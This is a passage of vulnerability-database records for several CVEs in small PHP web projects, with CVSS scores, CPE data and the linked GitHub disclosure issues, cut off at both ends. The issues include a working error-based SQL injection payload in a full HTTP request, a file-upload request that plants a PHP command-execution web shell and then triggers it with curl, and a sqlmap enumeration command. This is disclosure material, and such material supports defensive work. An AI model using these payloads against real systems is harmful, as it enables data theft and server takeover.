"exploitabilityScore": 2.8, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": [ { "cvssData": { "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "Safety": "NOT_DEFINED", "attackComplexity": "LOW", "attackRequirements": "NONE", "attackVector": "NETWORK", "availabilityRequirement": "NOT_DEFINED", "baseScore": 5.3, "baseSeverity": "MEDIUM", "confidentialityRequirement": "NOT_DEFINED", "exploitMaturity": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "privilegesRequired": "LOW", "providerUrgency": "NOT_DEFINED", "subAvailabilityImpact": "NONE", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "userInteraction": "NONE", "valueDensity": "NOT_DEFINED", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "version": "4.0", "vulnAvailabilityImpact": "LOW", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "LOW", "vulnerabilityResponseEffort": "NOT_DEFINED" }, "source": "cna@vuldb.com", "type": "Secondary" } ] }
[ { "source": "cna@vuldb.com", "tags": [ "Exploit" ], "url": "https://github.com/CveSecLook/cve/issues/45" }, { "source": "cna@vuldb.com", "tags": [ "Permissions Required" ], "url": "https://vuldb.com/?ctiid.268461" }, { "source": "cna@vuldb.com", "tags": [ "Third Party Advisory" ], "url": "https://vuldb.com/?id.268461" }, { "source": "cna@vuldb.com", "tags": [ "VDB Entry" ], "url": "https://vuldb.com/?submit.356239" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit" ], "url": "https://github.com/CveSecLook/cve/issues/45" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Permissions Required" ], "url": "https://vuldb.com/?ctiid.268461" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://vuldb.com/?id.268461" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "VDB Entry" ], "url": "https://vuldb.com/?submit.356239" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:best_online_news_portal_project:best_online_news_portal:1.0:*:*:*:*:*:*:*", "matchCriteriaId": "83739685-D8B6-4A14-89A7-C1AC4F28260A", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "89" ]
89
https://github.com/CveSecLook/cve/issues/45
[ "Exploit" ]
github.com
[ "CveSecLook", "cve" ]
# SourceCodester Best online news portal project in php free download /admin/index.php SQL injection # NAME OF AFFECTED PRODUCT(S) + CASAP Automated Enrollment System using PHP/MySQLi with Source Code ## Vendor Homepage + https://www.sourcecodester.com/php/16067/best-online-news-portal-project-php-free-download.html # AFFECTED AND/OR FIXED VERSION(S) ## submitter + xuanluansec ## Vulnerable File + /admin/index.php ## VERSION(S) + V1.0 ## Software Link + https://www.sourcecodester.com/sites/default/files/download/mayuri_k/101news_0.zip # PROBLEM TYPE ## Vulnerability Type + SQL injection ## Root Cause + The PHP method in line 10 of the /admin/index.php file retrieves user input from the POST element. Then, the value of this element will be passed to the code without proper purification or validation, and ultimately the database query in the PHP method on line 14. This may lead to SQL injection attacks. + ![2](https://github.com/CveSecLook/cve/assets/92671097/4c6c3cb0-54f8-4f6c-b4dc-bf0fadf5f44d) ## Impact + Attackers can exploit this vulnerability to gain database privileges, which can result in a large amount of data in the database. If the other party's database has DBA privileges, it may lead to server host privileges being obtained. # DESCRIPTION + xuanluansec has discovered a serious issue in "Best online news portal project in php free download" that can allow attackers to obtain large amounts of database content through SQL injection attacks. # Vulnerability details and POC ## Payload + admin1'||(SELECT 0x57466361 WHERE 3243=3243 AND (SELECT 3588 FROM(SELECT COUNT(*),CONCAT(0x716a707171,(SELECT (CASE WHEN (ISNULL(TIMESTAMPADD(MINUTE,9341,NULL))) THEN 1 ELSE 0 END)),0x717a627671,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a))||' + ![5](https://github.com/CveSecLook/cve/assets/92671097/63d41124-2c5d-409d-9906-d58e57933bfc) ## Burp Suite (POC) ``` POST /admin/ HTTP/1.1 Host: www.101news.com:8120 Content-Length: 328 Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 Origin: http://www.101news.com:8120 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.5790.102 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 Referer: http://www.101news.com:8120/admin/ Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9 Cookie: PHPSESSID=mgnba8pjlh638vt3ipj6ue06ph Connection: close username=admin1'||(SELECT 0x48577666 WHERE 4844=4844 AND (SELECT 7969 FROM(SELECT COUNT(*),CONCAT(0x716a707171,(SELECT (CASE WHEN ((SELECT super_priv FROM mysql.user WHERE user=0x726f6f74 LIMIT 0,1)=0x59) THEN 1 ELSE 0 END)),0x717a627671,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a))||'&password=admin&login= ``` + ![1](https://github.com/CveSecLook/cve/assets/92671097/7b3ca057-528a-45a8-8ffc-ac5344150da0) + Here is the MySQL database name obtained from the sqlmap attack + ![4](https://github.com/CveSecLook/cve/assets/92671097/612ec469-5222-4d57-a739-9dd68571ee41)
SourceCodester Best online news portal project in php free download /admin/index.php SQL injection
https://api.github.com/repos/CveSecLook/cve/issues/45/comments
0
2024-06-13T11:20:09Z
2024-06-13T11:20:09Z
https://github.com/CveSecLook/cve/issues/45
2,350,883,829
45
6,069
CVE-2024-37831
2024-06-14T20:15:11.777
Itsourcecode Payroll Management System 1.0 is vulnerable to SQL Injection in payroll_items.php via the ID parameter.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" }, { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 9.1, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 5.2, "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Third Party Advisory" ], "url": "https://github.com/ganzhi-qcy/cve/issues/5" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://github.com/ganzhi-qcy/cve/issues/5" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:itsourcecode:payroll_management_system:1.0:*:*:*:*:*:*:*", "matchCriteriaId": "5B5AA5E2-02CB-46E7-9DC9-84E4FA6D227A", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "89" ]
89
https://github.com/ganzhi-qcy/cve/issues/5
[ "Third Party Advisory" ]
github.com
[ "ganzhi-qcy", "cve" ]
1. [CVE ID] 2. CVE-CVE-2024-37831 3. submitter:quchunyi,yaomingjun,luowenwei,zhangxin,chenshan,tianbeibei,fengyilin,maqiutong,fuweidong,lishudong at Guangzhou University 4. [PRODUCT] 5. Itsourcecode 6. [VERSION] 7. V1.0 8. [PROBLEM TYPE] 9. SQL Injection 10. [DESCRIPTION] 11. Itsourcecode Payroll Management System 1.0 is vulnerable to SQL 12. Injection in payroll_items.php via the ID parameter.
CVE-2024-37831
https://api.github.com/repos/ganzhi-qcy/cve/issues/5/comments
0
2024-06-14T05:55:36Z
2024-10-04T07:37:20Z
https://github.com/ganzhi-qcy/cve/issues/5
2,352,575,813
5
6,070
CVE-2024-6008
2024-06-15T15:15:51.033
A vulnerability, which was classified as critical, was found in itsourcecode Online Book Store up to 1.0. Affected is an unknown function of the file /edit_book.php. The manipulation of the argument image leads to sql injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. VDB-268698 is the identifier assigned to this vulnerability.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "SINGLE", "availabilityImpact": "PARTIAL", "baseScore": 6.5, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0" }, "exploitabilityScore": 8, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "cna@vuldb.com", "type": "Secondary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "LOW", "baseScore": 6.3, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 3.4, "source": "cna@vuldb.com", "type": "Secondary" }, { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": [ { "cvssData": { "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "Safety": "NOT_DEFINED", "attackComplexity": "LOW", "attackRequirements": "NONE", "attackVector": "NETWORK", "availabilityRequirement": "NOT_DEFINED", "baseScore": 5.3, "baseSeverity": "MEDIUM", "confidentialityRequirement": "NOT_DEFINED", "exploitMaturity": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "privilegesRequired": "LOW", "providerUrgency": "NOT_DEFINED", "subAvailabilityImpact": "NONE", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "userInteraction": "NONE", "valueDensity": "NOT_DEFINED", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "version": "4.0", "vulnAvailabilityImpact": "LOW", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "LOW", "vulnerabilityResponseEffort": "NOT_DEFINED" }, "source": "cna@vuldb.com", "type": "Secondary" } ] }
[ { "source": "cna@vuldb.com", "tags": [ "Exploit", "Technical Description", "Third Party Advisory" ], "url": "https://github.com/1902zdq/cve/issues/1" }, { "source": "cna@vuldb.com", "tags": [ "Permissions Required" ], "url": "https://vuldb.com/?ctiid.268698" }, { "source": "cna@vuldb.com", "tags": [ "Third Party Advisory" ], "url": "https://vuldb.com/?id.268698" }, { "source": "cna@vuldb.com", "tags": [ "Issue Tracking" ], "url": "https://vuldb.com/?submit.357143" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Technical Description", "Third Party Advisory" ], "url": "https://github.com/1902zdq/cve/issues/1" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Permissions Required" ], "url": "https://vuldb.com/?ctiid.268698" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://vuldb.com/?id.268698" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Issue Tracking" ], "url": "https://vuldb.com/?submit.357143" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:isourcecode:online_book_store_project_in_php_with_source_code:1.0:*:*:*:*:*:*:*", "matchCriteriaId": "71AB5A7E-412A-4649-9E8D-465255D0757F", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "89" ]
89
https://github.com/1902zdq/cve/issues/1
[ "Exploit", "Technical Description", "Third Party Advisory" ]
github.com
[ "1902zdq", "cve" ]
# Itsourcecode Online-Bookstore-Project-In-PHP-Source-Code v1.0 edit_book.php Unrestricted Upload # NAME OF AFFECTED PRODUCT(S) + Online-Bookstore-Project-In-PHP-Source-Code ## Vendor Homepage + https://itsourcecode.com/free-projects/php-project/online-book-store-project-in-php-with-source-code/ # AFFECTED AND/OR FIXED VERSION(S) ## submitter + zdq123 ## Vulnerable File + edit_book.php ## VERSION(S) + V1.0 ## Software Link + https://itsourcecode.com/wp-content/uploads/2021/03/Online-Bookstore-Project-In-PHP-Source-Code.zip # PROBLEM TYPE ## Vulnerability Type + Unrestricted Upload ## Root Cause + In line 16 of the edit_book.php file,The input obtained through $- FILES is directly used to determine the storage location of the file, without conducting a complete security check. The specific code snippet is as follows: <img width="580" alt="1" src="https://github.com/1902zdq/cve/assets/117020819/84defe02-4a22-4f56-aff9-6c46a5846ad2"> ## Impact + Attackers can exploit this vulnerability to upload malicious files without restriction, which can lead to file overwrite, file injection, directory traversal attacks, and denial of service attacks. Exploiting malicious files can lead to remote attacks on RCE # DESCRIPTION + The file upload operation was triggered on line 16 of the "edit_book.php" file, and the uploaded file was received using the "$- FILES" variable. Due to the lack of appropriate input validation and cleaning, remote attackers only need to use regular user login to pass malicious payloads through this file upload function, resulting in unrestricted file uploads, which may further lead to remote code execution (RCE). # Vulnerability details and POC ``` POST /edit_book.php HTTP/1.1 Host: 192.168.210.199:1213 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:126.0) Gecko/20100101 Firefox/126.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 Accept-Encoding: gzip, deflate, br Content-Type: multipart/form-data; boundary=---------------------------67818604130845076034240768557 Content-Length: 1699 Origin: http://192.168.210.199:1213 Connection: close Referer: http://192.168.210.199:1213/admin_edit.php?bookisbn=978-1-49192-706-9 Upgrade-Insecure-Requests: 1 Priority: u=1 -----------------------------67818604130845076034240768557 Content-Disposition: form-data; name="isbn" 978-1-49192-706-9 -----------------------------67818604130845076034240768557 Content-Disposition: form-data; name="title" C# 6.0 in a Nutshell, 6th Edition -----------------------------67818604130845076034240768557 Content-Disposition: form-data; name="author" Joseph Albahari, Ben Albahari -----------------------------67818604130845076034240768557 Content-Disposition: form-data; name="image"; filename="123.php" Content-Type: application/octet-stream <?php system("ipconfig"); ?> -----------------------------67818604130845076034240768557 Content-Disposition: form-data; name="descr" When you have questions about C# 6.0 or the .NET CLR and its core Framework assemblies, this bestselling guide has the answers you need. C# has become a language of unusual flexibility and breadth since its premiere in 2000, but this continual growth means there's still much more to learn. Organized around concepts and use cases, this thoroughly updated sixth edition provides intermediate and advanced programmers with a concise map of C# and .NET knowledge. Dive in and discover why this Nutshell guide is considered the definitive reference on C#. -----------------------------67818604130845076034240768557 Content-Disposition: form-data; name="price" 20.00 -----------------------------67818604130845076034240768557 Content-Disposition: form-data; name="publisher" O'Reilly Media -----------------------------67818604130845076034240768557 Content-Disposition: form-data; name="save_change" Change -----------------------------67818604130845076034240768557-- ``` <img width="905" alt="2" src="https://github.com/1902zdq/cve/assets/117020819/569358a1-acb6-4753-b0a6-8e13901bcf6e"> <img width="563" alt="3" src="https://github.com/1902zdq/cve/assets/117020819/8c2547c0-e0d9-4879-8ba5-0b316c38e071"> ## I successfully executed the PHP script on the terminal ```bash curl http://192.168.210.199:1213/bootstrap/img/123.php ``` <img width="317" alt="4" src="https://github.com/1902zdq/cve/assets/117020819/09a1a521-d6ab-404c-9325-19ed3dfc8317">
Itsourcecode Online-Bookstore-Project-In-PHP-Source-Code v1.0 edit_book.php Unrestricted Upload
https://api.github.com/repos/Wumshi/cve/issues/1/comments
0
2024-06-14T06:23:27Z
2024-06-14T06:23:27Z
https://github.com/Wumshi/cve/issues/1
2,352,612,520
1
6,071
CVE-2024-6009
2024-06-15T16:15:09.830
A vulnerability has been found in itsourcecode Event Calendar 1.0 and classified as critical. Affected by this vulnerability is the function regConfirm/regDelete of the file process.php. The manipulation of the argument userId leads to sql injection. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-268699.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "SINGLE", "availabilityImpact": "PARTIAL", "baseScore": 6.5, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0" }, "exploitabilityScore": 8, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "cna@vuldb.com", "type": "Secondary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "LOW", "baseScore": 6.3, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 3.4, "source": "cna@vuldb.com", "type": "Secondary" }, { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": [ { "cvssData": { "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "Safety": "NOT_DEFINED", "attackComplexity": "LOW", "attackRequirements": "NONE", "attackVector": "NETWORK", "availabilityRequirement": "NOT_DEFINED", "baseScore": 5.3, "baseSeverity": "MEDIUM", "confidentialityRequirement": "NOT_DEFINED", "exploitMaturity": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "privilegesRequired": "LOW", "providerUrgency": "NOT_DEFINED", "subAvailabilityImpact": "NONE", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "userInteraction": "NONE", "valueDensity": "NOT_DEFINED", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "version": "4.0", "vulnAvailabilityImpact": "LOW", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "LOW", "vulnerabilityResponseEffort": "NOT_DEFINED" }, "source": "cna@vuldb.com", "type": "Secondary" } ] }
[ { "source": "cna@vuldb.com", "tags": [ "Exploit", "Technical Description", "Third Party Advisory" ], "url": "https://github.com/AutoZhou1/cve/issues/1" }, { "source": "cna@vuldb.com", "tags": [ "Permissions Required" ], "url": "https://vuldb.com/?ctiid.268699" }, { "source": "cna@vuldb.com", "tags": [ "Third Party Advisory" ], "url": "https://vuldb.com/?id.268699" }, { "source": "cna@vuldb.com", "tags": [ "Issue Tracking" ], "url": "https://vuldb.com/?submit.357243" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Technical Description", "Third Party Advisory" ], "url": "https://github.com/AutoZhou1/cve/issues/1" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Permissions Required" ], "url": "https://vuldb.com/?ctiid.268699" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://vuldb.com/?id.268699" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Issue Tracking" ], "url": "https://vuldb.com/?submit.357243" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:itsourcecode:learning_management_system_project_in_php_with_source_code:1.0:*:*:*:*:*:*:*", "matchCriteriaId": "AD4B5F22-F2E1-4DDB-ABEA-61B253FE76F6", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "89" ]
89
https://github.com/AutoZhou1/cve/issues/1
[ "Exploit", "Technical Description", "Third Party Advisory" ]
github.com
[ "AutoZhou1", "cve" ]
# Itsourcecode Event Calendar In PHP v2.3 process.php v2.3 SQL injection # NAME OF AFFECTED PRODUCT(S) + Event Calendar In PHP ## Vendor Homepage + https://itsourcecode.com/free-projects/php-project/learning-management-system-project-in-php-with-source-code/ # AFFECTED AND/OR FIXED VERSION(S) ## submitter + Code099 ## Vulnerable File + process.php ## VERSION(S) + v2.3 ## Software Link + https://itsourcecode.com/wp-content/uploads/2020/07/e-learningsystem1.zip # PROBLEM TYPE ## Vulnerability Type + SQL injection ## Root Cause + A SQL injection vulnerability was found in the 'process.php' file of the 'Event Calendar In PHP' project. The reason for this issue is that attackers inject malicious code from the parameter "userId " and use it directly in SQL queries without appropriate cleaning or validation. This allows attackers to forge input values, thereby manipulating SQL queries and performing unauthorized operations. <img width="676" alt="1" src="https://github.com/AutoZhou1/cve/assets/66429903/90a74348-886f-46e7-b8d6-e943ec888fdd"> ## Impact + Attackers only need to use registered regular users to exploit this SQL injection vulnerability for unauthorized database access, sensitive data leakage, data tampering, comprehensive system control, and even service interruption, posing a serious threat to system security and business continuity. # DESCRIPTION + Due to insufficient user input validation for the "userId " parameter, a serious SQL injection vulnerability was discovered in the login function of the " Event Calendar In PHP", allowing attackers to inject malicious SQL queries. Therefore, attackers can gain unauthorized access to the database, modify or delete data, and access sensitive information without logging in. Immediate remedial measures are needed to ensure system security and protect data integrity. # Vulnerability details and POC ## Vulnerability type: + time-based blind + boolean-based blind + error-based + UNION query ## Vulnerability location: + 'userId ' parameter ## Payload: <img width="371" alt="2" src="https://github.com/AutoZhou1/cve/assets/66429903/724041a9-6ac9-438b-9e55-4df323df4833"> ## The following are screenshots of some specific information obtained from testing and running with the sqlmap tool: ```bash sqlmap -u "http://192.168.210.199:1220/event-management/api/process.php?cmd=user&userId=16" --batch --dbs ``` <img width="372" alt="3" src="https://github.com/AutoZhou1/cve/assets/66429903/3fdb3715-d717-4a33-b946-0b565a58846c"> # Suggested repair 1. **Use prepared statements and parameter binding:** Preparing statements can prevent SQL injection as they separate SQL code from user input data. When using prepare statements, the value entered by the user is treated as pure data and will not be interpreted as SQL code. 2. **Input validation and filtering:** Strictly validate and filter user input data to ensure it conforms to the expected format. 3. **Minimize database user permissions:** Ensure that the account used to connect to the database has the minimum necessary permissions. Avoid using accounts with advanced permissions (such as' root 'or' admin ') for daily operations. 4. **Regular security audits:** Regularly conduct code and system security audits to promptly identify and fix potential security vulnerabilities.
Itsourcecode Event Calendar In PHP v2.3 process.php v2.3 SQL injection
https://api.github.com/repos/Code-099/cve/issues/1/comments
0
2024-06-14T08:09:04Z
2024-06-14T08:09:05Z
https://github.com/Code-099/cve/issues/1
2,352,801,293
1
6,072
CVE-2024-6013
2024-06-15T16:15:10.137
A vulnerability was found in itsourcecode Online Book Store 1.0. It has been rated as critical. This issue affects some unknown processing of the file admin_delete.php. The manipulation of the argument bookisbn leads to sql injection. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-268721 was assigned to this vulnerability.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "SINGLE", "availabilityImpact": "PARTIAL", "baseScore": 6.5, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0" }, "exploitabilityScore": 8, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "cna@vuldb.com", "type": "Secondary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "LOW", "baseScore": 6.3, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 3.4, "source": "cna@vuldb.com", "type": "Secondary" }, { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": [ { "cvssData": { "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "Safety": "NOT_DEFINED", "attackComplexity": "LOW", "attackRequirements": "NONE", "attackVector": "NETWORK", "availabilityRequirement": "NOT_DEFINED", "baseScore": 5.3, "baseSeverity": "MEDIUM", "confidentialityRequirement": "NOT_DEFINED", "exploitMaturity": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": 